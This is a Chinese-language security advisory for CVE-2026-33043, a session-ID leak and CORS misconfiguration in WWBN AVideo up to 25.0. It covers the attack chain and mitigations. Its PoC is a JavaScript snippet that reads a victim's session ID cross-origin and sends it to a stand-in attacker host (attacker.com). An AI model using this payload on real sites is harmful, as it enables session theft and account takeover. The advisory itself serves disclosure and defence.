IPBUF安全漏洞报告
English
CVE-2026-33043 CVSS 8.1 高危

CVE-2026-33043 AVideo会话ID泄露与CORS接管漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33043
漏洞类型
CORS配置错误 / 会话劫持
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
WWBN AVideo

相关标签

CORSSession HijackingAVideoInformation DisclosureAccount Takeover

漏洞概述

WWBN AVideo是一个开源视频平台。在25.0及以下版本中,系统存在严重的安全缺陷。/objects/phpsessionid.json.php接口未经身份验证即暴露当前PHP会话ID。同时,allowOrigin()函数错误地配置了CORS,允许任意跨域请求携带凭证。这导致了跨域会话窃取风险,攻击者可利用此漏洞完全接管用户账户。

技术细节

该漏洞的核心在于不当的会话处理与CORS策略配置。在受影响的AVideo版本中,/objects/phpsessionid.json.php接口缺乏必要的身份验证机制,导致攻击者无需登录即可获取服务端生成的PHP Session ID。更为严重的是,系统在处理跨域请求时,allowOrigin()函数直接回显用户提交的Origin头部至Access-Control-Allow-Origin响应头,并配合Access-Control-Allow-Credentials: true。这种不当的CORS配置允许恶意网站向AVideo平台发起携带用户凭证的跨域请求,并读取响应内容。攻击者结合这两点,通过诱导受害者访问恶意网页,利用JavaScript跨域读取Session ID,进而劫持用户会话,绕过身份验证实现账户完全接管。

攻击链分析

STEP 1
1. 信息收集
攻击者发现目标使用的是WWBN AVideo 25.0或更低版本。
STEP 2
2. 构造恶意页面
攻击者准备一个包含恶意JavaScript代码的网页,该代码旨在向目标服务器发起跨域请求。
STEP 3
3. 诱导访问
攻击者诱导已登录目标AVideo平台的用户点击链接或访问恶意页面(满足UI:R交互要求)。
STEP 4
4. 跨域请求
受害者浏览器执行恶意脚本,向 /objects/phpsessionid.json.php 发起请求。由于CORS配置错误,响应被允许读取。
STEP 5
5. 会话劫持
攻击者获取到响应中的PHP Session ID,利用此ID冒充受害者身份,实现账户接管。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC: Exploiting CORS misconfiguration to steal Session ID Usage: Host this script on a malicious server (e.g., evil.com) and trick a logged-in victim to visit it. --> <script> const targetUrl = 'http://target-site.com/objects/phpsessionid.json.php'; fetch(targetUrl, { method: 'GET', credentials: 'include' // Important: sends cookies }) .then(response => response.json()) .then(data => { console.log('Leaked Session ID:', data); // Send data to attacker's server fetch('http://attacker.com/log?id=' + encodeURIComponent(data.session_id)); }) .catch(error => console.error('Error:', error)); </script>

影响范围

WWBN AVideo <= 25.0

防御指南

临时缓解措施
如果无法立即升级,建议通过Web服务器(如Nginx或Apache)规则拦截对 /objects/phpsessionid.json.php 的外部请求,或者仅允许受信任的内网IP访问。此外,应检查并修改CORS配置,确保 Access-Control-Allow-Origin 不会设置为通配符 * 或未经验证的请求头,并避免与 Credentials 同时使用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表